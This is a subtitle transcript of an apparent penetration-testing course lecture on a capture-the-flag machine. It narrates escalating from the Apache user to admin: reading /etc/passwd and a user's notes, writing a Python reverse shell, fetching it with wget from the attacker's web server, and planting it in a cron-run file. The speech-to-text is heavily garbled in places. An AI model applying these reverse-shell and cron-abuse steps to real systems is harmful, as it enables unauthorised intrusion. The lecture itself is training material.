1 00:00:00,720 --> 00:00:07,440 Hi, within this lecture, we're going to see what we can do to escalate our privileges because we are 2 00:00:07,440 --> 00:00:14,190 currently in the server as user Apache and we're going to see what we can do to make our way up. 3 00:00:14,670 --> 00:00:19,980 So what I'm going to do, I'm going to, of course, Kathy, password to be starting. 4 00:00:20,340 --> 00:00:23,310 OK, and here we have the route, of course. 5 00:00:23,790 --> 00:00:27,230 And let's see what we can see over here. 6 00:00:27,240 --> 00:00:33,840 We have the Apache, which is where we are currently m and we have is Epizyme. 7 00:00:33,840 --> 00:00:36,570 And we have quite various users over here. 8 00:00:36,570 --> 00:00:38,190 Like we have easy peasy. 9 00:00:38,430 --> 00:00:45,380 We have admin, we have free God and we have frisee itself. 10 00:00:45,870 --> 00:00:50,970 So I don't know, maybe we are going to see every one of those. 11 00:00:50,970 --> 00:00:57,260 Maybe we're going to just jump right into some of those and make our way up from there. 12 00:00:57,630 --> 00:01:02,940 So I'm going to cut that issue to see if we get any kind of description over here. 13 00:01:03,390 --> 00:01:08,310 So NUPE, we just see the goal and the IP address over there. 14 00:01:09,060 --> 00:01:13,790 So let's see what else we can get over here. 15 00:01:14,160 --> 00:01:20,240 So I'm going to try to go into the users, OK? 16 00:01:20,730 --> 00:01:22,470 And let me see where we are. 17 00:01:22,470 --> 00:01:24,840 We are in the route right now. 18 00:01:24,840 --> 00:01:30,450 If we run L.A., we can see the current folders and files that are available to us. 19 00:01:31,470 --> 00:01:33,390 Let's see if we can go to route. 20 00:01:33,600 --> 00:01:35,160 I'm going to succeed route. 21 00:01:35,160 --> 00:01:37,140 Of course, we cannot do that. 22 00:01:37,480 --> 00:01:42,000 OK, maybe we can go to some other users folder. 23 00:01:42,000 --> 00:01:44,610 Maybe we can find some kind of lead over there. 24 00:01:44,940 --> 00:01:46,320 So I'm going to go to home. 25 00:01:46,680 --> 00:01:51,660 And as you can see in the home, we have admin, easy peasy and foresty got. 26 00:01:52,020 --> 00:01:54,840 So I'm going to go into admin, OK? 27 00:01:54,870 --> 00:01:56,070 I cannot do that. 28 00:01:56,250 --> 00:01:58,200 I'm going to go into easy peasy. 29 00:01:58,590 --> 00:01:59,460 And here you go. 30 00:01:59,460 --> 00:02:00,510 We can't do that. 31 00:02:00,870 --> 00:02:08,340 And if we run, unless we have a lot of files and folders over here, apparently, OK, we have make 32 00:02:08,340 --> 00:02:08,960 dive. 33 00:02:09,990 --> 00:02:13,790 We have let me run the SLA and see it in a better way. 34 00:02:14,550 --> 00:02:22,980 So over here in the easy peasy, we have some kind of hidden files and folders over here, OK? 35 00:02:23,430 --> 00:02:28,800 And we have, I believe, some kind of binaries as well, like S.H., more charm. 36 00:02:29,280 --> 00:02:39,600 And let's see, we have Nano and yeah, we have not stopped Steve, which is good because we can read 37 00:02:39,600 --> 00:02:44,040 it, I believe looking for the I'm looking for permissions. 38 00:02:44,460 --> 00:02:48,150 I'm going to get the notes that text and here you go. 39 00:02:48,150 --> 00:02:52,680 It says, Yoaz, I made it possible for you to do some automated checks. 40 00:02:53,250 --> 00:03:01,500 I did only I love your access to user been system binaries so we can run some binaries in the user folder, 41 00:03:01,500 --> 00:03:02,220 which is good. 42 00:03:02,820 --> 00:03:10,280 I did we were a copy a few extra often needed comments to my home directory, which is S.H. Mode, the 43 00:03:10,380 --> 00:03:14,490 F cat and copes crap and so many more. 44 00:03:14,730 --> 00:03:15,540 Great. 45 00:03:16,200 --> 00:03:23,130 Don't forget to specify the full path for each binary so we can actually use those binaries in order 46 00:03:23,130 --> 00:03:24,680 to create a reverse shuttle. 47 00:03:24,690 --> 00:03:31,860 I believe and we have a big tip over here, he says that just put a file called Run This in the temp, 48 00:03:32,100 --> 00:03:35,700 OK, each line within one comment. 49 00:03:35,700 --> 00:03:38,590 So we have to specify our wine line. 50 00:03:38,610 --> 00:03:46,110 You're over here to run those binaries, as far as I understand, so we can run around some binaries 51 00:03:46,110 --> 00:03:50,790 as admin user, but we have to create a file in order to do that. 52 00:03:51,270 --> 00:03:54,360 But we cannot KDA into that folder. 53 00:03:54,360 --> 00:04:03,480 So I believe we're going to have to see what kind of things we have over there by running an SLA or 54 00:04:03,480 --> 00:04:04,410 something like that. 55 00:04:04,410 --> 00:04:09,030 Let's see if we can check the notes that using this. 56 00:04:09,330 --> 00:04:11,010 Nope, we cannot do that. 57 00:04:11,010 --> 00:04:17,820 Even though they copy these binaries into the admin folder, we cannot directly reach it. 58 00:04:18,150 --> 00:04:20,700 We cannot write directly execute them. 59 00:04:20,970 --> 00:04:29,100 So if we could have done that, then it would make our way easier because we can run some binary commands 60 00:04:29,400 --> 00:04:33,660 and but there is a way to do that. 61 00:04:33,660 --> 00:04:39,810 It says I just put a file called Run This into AMPE and each Lemont each line. 62 00:04:39,810 --> 00:04:44,550 Should one include the one comment, then the output goes to the file. 63 00:04:44,550 --> 00:04:49,840 Crohn result in the temp and it should run every minute with my account privileges. 64 00:04:49,860 --> 00:04:52,620 So there is a chrome tab going on over here. 65 00:04:52,620 --> 00:04:59,940 Cron job, OK, and in that cron job it runs the run this file every minute. 66 00:05:00,620 --> 00:05:08,270 And if we can specify a one liner over there to run a binary and privilege escalator's privilege mode, 67 00:05:08,540 --> 00:05:14,030 then we can get a reversion back to us, then we can be admin user. 68 00:05:14,180 --> 00:05:18,800 I don't know if it will lead us to the root, but most probably it will. 69 00:05:19,010 --> 00:05:25,960 And its administrator user, maybe we can actually go into the root by not doing so many things later 70 00:05:25,970 --> 00:05:26,360 on. 71 00:05:26,870 --> 00:05:27,400 Right. 72 00:05:27,770 --> 00:05:32,120 So I'm going to do exactly like instructed over here. 73 00:05:32,420 --> 00:05:39,740 First of all, I'm going to see what kind of binaries under the user bin to see if we can run Python, 74 00:05:39,750 --> 00:05:40,640 for example. 75 00:05:42,020 --> 00:05:44,150 Let me see if we can run Python. 76 00:05:44,660 --> 00:05:45,380 And here you go. 77 00:05:45,380 --> 00:05:51,340 I lost the show and of course, in order to gain the show, I'm going to run an agency and we Alpay 78 00:05:51,350 --> 00:05:52,970 one to two for one more time. 79 00:05:53,360 --> 00:06:02,000 And I'm going to have to go into the Firefox and run this version one more time and let's see if we 80 00:06:02,000 --> 00:06:03,560 can get this over here. 81 00:06:03,560 --> 00:06:13,140 So 10 to 16 and CYO uploads shelled out PMG or that PMG. 82 00:06:13,580 --> 00:06:14,260 Here you go. 83 00:06:14,300 --> 00:06:15,410 I believe it works. 84 00:06:15,470 --> 00:06:15,850 Here you go. 85 00:06:15,870 --> 00:06:17,300 I have to you one more time. 86 00:06:17,810 --> 00:06:18,530 So great. 87 00:06:18,650 --> 00:06:21,290 I don't know if we have the python or not. 88 00:06:21,710 --> 00:06:29,010 So I'm going to run unless and I'm going to go to the home folder one more time and into the easy peasy 89 00:06:29,900 --> 00:06:32,030 to see that node one more time. 90 00:06:32,240 --> 00:06:33,700 I'm going to run Al-Saleh SLA. 91 00:06:33,980 --> 00:06:34,790 Here you go. 92 00:06:35,150 --> 00:06:38,900 I'm going to get the NATO xda and here we are. 93 00:06:39,230 --> 00:06:44,180 So far I tried to see if we have Python over here and I failed to do that. 94 00:06:44,180 --> 00:06:47,480 So we're going to have to take a different result over here. 95 00:06:48,080 --> 00:06:55,700 And first of all, I'm really I really need to see what kind of think that I should put into the run 96 00:06:55,700 --> 00:06:56,480 this file. 97 00:06:56,690 --> 00:07:02,780 So I'm going to try and let's allow into this user and see what kind of things that we have over there, 98 00:07:03,230 --> 00:07:03,890 OK? 99 00:07:04,370 --> 00:07:11,700 And we're going to try and if we can have a python running over here, then we're going to try that. 100 00:07:12,260 --> 00:07:19,490 So what I'm going to do, I'm going to unless I play into the user bin and see all the available binaries 101 00:07:19,580 --> 00:07:20,220 for me. 102 00:07:20,270 --> 00:07:21,920 So right away. 103 00:07:22,220 --> 00:07:26,500 And user slash bin, here you go. 104 00:07:26,540 --> 00:07:29,030 I believe we managed to see that. 105 00:07:29,030 --> 00:07:32,090 And we have a lot of things going on over here. 106 00:07:32,090 --> 00:07:36,140 As you can see, we have a lot of binaries inside of our server. 107 00:07:36,680 --> 00:07:42,170 And I think we should do grep because it will take some time to find it from here. 108 00:07:42,170 --> 00:07:50,780 So I'm going to say, unless L-A user bin and I'm going to pipe this into the grep and I'm going to 109 00:07:50,780 --> 00:07:54,350 grab the python and here we have the python. 110 00:07:54,530 --> 00:08:01,520 I believe we only have Python two, but it's OK, right, because we have the reverse scale codes for 111 00:08:01,520 --> 00:08:03,980 Python two independent monkey. 112 00:08:04,250 --> 00:08:06,050 We can take leverage of that. 113 00:08:06,380 --> 00:08:15,650 And if we can make this work, then I can just create a ram this file as they use the python and just 114 00:08:15,800 --> 00:08:18,610 execute this file, for example. 115 00:08:18,620 --> 00:08:26,030 OK, so I'm going to go for the Panthers monkey one more time and I'm going to search for Python reverse 116 00:08:26,030 --> 00:08:28,340 Shokichi like we have done before. 117 00:08:28,640 --> 00:08:30,560 I'm going to open the Panthers monkey. 118 00:08:31,190 --> 00:08:36,980 And if you cannot go into the Panthers monkey, by the way, you can just use what I'm using. 119 00:08:37,340 --> 00:08:39,440 You can just type the python comments. 120 00:08:39,920 --> 00:08:41,330 I believe you right now. 121 00:08:41,330 --> 00:08:43,700 You see how this works. 122 00:08:43,730 --> 00:08:52,850 OK, so let's open a new tab and do this in the local and we can just do this under the free folder. 123 00:08:52,970 --> 00:08:58,640 I'm going to open and now Python shall dot p y over here. 124 00:08:58,670 --> 00:09:01,340 OK, so I'm going to paste this thing in. 125 00:09:01,760 --> 00:09:07,400 And since this is a one liner, we can just put this in there on this folder as well, but it won't 126 00:09:07,400 --> 00:09:11,020 know how to run the python from the user binaries. 127 00:09:11,020 --> 00:09:18,650 So what I'm going to do, I'm just going to turn this into a regular python called, as we have done 128 00:09:18,650 --> 00:09:19,300 before. 129 00:09:19,340 --> 00:09:27,110 OK, I'm going to import the library's SOCAP subprocess and the operating system libraries over here. 130 00:09:27,290 --> 00:09:31,490 So I'm going to define the Zucchet as s. 131 00:09:31,490 --> 00:09:35,030 So this is how the circuit works, as you might remember. 132 00:09:35,540 --> 00:09:38,720 And over here, I'm just going to give my own IP address. 133 00:09:38,960 --> 00:09:43,190 And we need to change the port here as well, because we have used the one, two, three, four. 134 00:09:43,310 --> 00:09:49,370 I'm going to make it Phi Phi Phi Phi Phi, but you can just use any port that you want that is not in 135 00:09:49,370 --> 00:09:50,360 currently use. 136 00:09:50,370 --> 00:09:58,400 OK, so I'm coming over here to delete the semicolons because we don't need them in the regular python 137 00:09:58,400 --> 00:09:58,940 code. 138 00:09:59,680 --> 00:10:00,710 And here you go. 139 00:10:00,970 --> 00:10:06,380 So it will give us some as a child and I'm going to delete those things as well. 140 00:10:06,580 --> 00:10:07,450 So here you go. 141 00:10:07,480 --> 00:10:08,950 Our Python code is ready. 142 00:10:08,950 --> 00:10:13,030 If you want, you can just post this video and write it on your own. 143 00:10:13,030 --> 00:10:17,040 Make sure you write exactly like what you have seen over there. 144 00:10:17,620 --> 00:10:19,200 So let me get this. 145 00:10:19,210 --> 00:10:20,030 And here you go. 146 00:10:20,380 --> 00:10:31,600 So I'm going to take this and put it into my Web server over here, OK, in my user var e-mail folder. 147 00:10:31,600 --> 00:10:36,400 So wah wah slash double level W and slash HTML. 148 00:10:37,030 --> 00:10:38,730 So this copy that thing. 149 00:10:38,740 --> 00:10:43,790 So I'm going to run my Pache server like we have done before. 150 00:10:44,170 --> 00:10:48,960 So I have a python child up in my Pache server. 151 00:10:49,090 --> 00:10:54,460 So what I'm going to do, I'm going to just use we get over here and as you can see we have the we yet. 152 00:10:54,820 --> 00:11:02,240 So I'm going to go on the stamp because that's where we should actually execute this, as you can see 153 00:11:02,240 --> 00:11:02,890 in the top. 154 00:11:02,920 --> 00:11:08,350 We don't have anything right now, but we're going to have soon if I run this correct. 155 00:11:08,620 --> 00:11:17,290 So we get HTP or too far for me and write your own IP address over here in order to test this and just 156 00:11:17,290 --> 00:11:19,630 write the thing that you have just copied. 157 00:11:19,840 --> 00:11:20,970 And here you go. 158 00:11:21,010 --> 00:11:27,560 I managed to download the Python shell in my server, so I'm going to run this cat. 159 00:11:27,850 --> 00:11:28,800 And here you go. 160 00:11:29,110 --> 00:11:30,700 We have the python shell. 161 00:11:31,090 --> 00:11:37,570 So rather than trying to run this python shall over here, we can actually run this by Dongzhou right 162 00:11:37,570 --> 00:11:37,870 now. 163 00:11:37,870 --> 00:11:45,580 But it will give us the shell, but it will give us the shell as the current user that we are in, as 164 00:11:45,580 --> 00:11:52,300 in I believe we are in the Apache user in order to get this in a privileged way, in an escalated privileged 165 00:11:52,300 --> 00:12:00,520 way, we need to make this run with the current job it was talking about so that it can run as admin 166 00:12:00,520 --> 00:12:00,960 user. 167 00:12:01,810 --> 00:12:05,560 So what we are going to do, we're going to do as instructed before. 168 00:12:05,590 --> 00:12:11,670 We're going to have to create a run this file and in that run this file, we have to specify something. 169 00:12:11,680 --> 00:12:17,630 So in order to do that, I'm going to just run echo and say user being Python. 170 00:12:17,680 --> 00:12:25,630 OK, so it's going to use the python over here under the user bin folder and it's going to execute the 171 00:12:25,630 --> 00:12:30,310 top python shell that pivo and don't forget to place a space between them. 172 00:12:30,790 --> 00:12:34,540 And I'm going to put this into a file called Run This. 173 00:12:34,540 --> 00:12:39,520 And since we are currently in the TMP folder, we can just execute this over here. 174 00:12:39,910 --> 00:12:41,740 OK, I'm going to run this. 175 00:12:41,900 --> 00:12:44,170 It will be run within one minute. 176 00:12:44,170 --> 00:12:46,600 I believe, as you can see, if you run it, let's play. 177 00:12:46,600 --> 00:12:52,690 We can see this if you're on Ketron this, it will just run this command and it also complies with the 178 00:12:52,690 --> 00:12:55,080 one line rule as well. 179 00:12:55,390 --> 00:12:59,470 So I'm going to say and can we help Phi Phi Phi Phi Phi over here? 180 00:12:59,800 --> 00:13:03,760 And within one minute it should get executed. 181 00:13:04,090 --> 00:13:06,550 OK, let me run it one more time. 182 00:13:06,730 --> 00:13:13,150 As you can see, this will create something called, I believe, result chrome or something like that. 183 00:13:13,330 --> 00:13:20,950 And once we see that it will it will mean that it gets it gets executed in a regular way. 184 00:13:21,160 --> 00:13:24,400 Let's see how this thing was called. 185 00:13:24,400 --> 00:13:32,770 Let me come over here to top and see if we can get the note back and it will pass some time as well. 186 00:13:32,770 --> 00:13:33,550 Here you go. 187 00:13:33,880 --> 00:13:41,110 Yeah, it will just create a file called Chrome Result, OK, in the TMB. 188 00:13:41,110 --> 00:13:44,890 So if you see the chrome result, it means that it got executed. 189 00:13:45,610 --> 00:13:48,790 So this is not a rule in a regular server. 190 00:13:48,850 --> 00:13:51,790 This is the rule that others CTF made possible. 191 00:13:51,790 --> 00:13:52,120 Right. 192 00:13:52,420 --> 00:13:54,220 So if I run, I was like, here you go. 193 00:13:54,250 --> 00:13:55,420 You see the chrome result. 194 00:13:55,600 --> 00:13:57,250 Let me go back and here you go. 195 00:13:57,250 --> 00:13:59,200 We have the S.H. Show. 196 00:13:59,440 --> 00:14:01,060 So if you're on, who am I? 197 00:14:01,060 --> 00:14:03,040 We are admin right now. 198 00:14:03,430 --> 00:14:11,080 So we managed to become admin, but I believe we are not currently Ruzzo, so we cannot go and be rude 199 00:14:11,380 --> 00:14:12,220 directly. 200 00:14:12,400 --> 00:14:14,860 So let me get the ATSE password over. 201 00:14:14,860 --> 00:14:16,510 Here we are. 202 00:14:16,810 --> 00:14:19,000 We can see the route, we can see the admin. 203 00:14:19,150 --> 00:14:22,000 But there are some couple of other users here as well. 204 00:14:22,120 --> 00:14:27,760 So we might take a look at those ones as well in the upcoming lecture.